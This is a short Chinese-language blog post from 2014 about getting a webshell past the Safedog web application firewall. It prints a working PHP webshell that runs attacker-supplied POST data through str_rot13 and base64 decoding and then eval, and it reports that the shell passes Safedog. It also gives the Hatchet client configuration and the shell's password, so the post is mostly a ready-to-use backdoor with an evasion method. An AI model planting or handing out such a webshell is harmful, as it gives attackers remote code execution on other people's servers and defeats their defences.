MENU

Hatchet.ini to bypass safe dog

October 25, 2014 • 技术随笔

众所周知,安全狗拦截菜刀数据包是匹配eval()|base64_decode()这些特征。以前我们使用OD修改数据包(当然还可以使用中转脚本:http://x95.org/php-and-asp-Transfer-script.html

但是改来改去还是存在base64_decode这个关键词,菜刀的是不开源的,没有很便捷的方式修改程序本身数据包使用的base64编码,因此这是我使用斧头(Hatchet)来演示。

Talk is cheap,show me the c0de。

服务端:

Server.php

<?php 
$data = $_POST['z']; 
if ($data!="") 
{ 
  $page=($_POST['z1']);
  @eval("\$page2 = $page;");
  $page2=base64_decode(str_rot13($page2));
  @eval("\$str = $page2;"); 
} 
?>

服务端检验报告(D盾等级为3,安全狗通过),服务端不负责为今后留后面服务,重点在于用菜刀与之通讯。(基于红师傅的脚本修改来)

下面来说客户端数据包修改:

Hatchet.ini

z=a=c;&z1=str_rot13($_POST[z0]);&z0=

服务端的密码为z

Archives QR Code
QR Code for this page
Tipping QR Code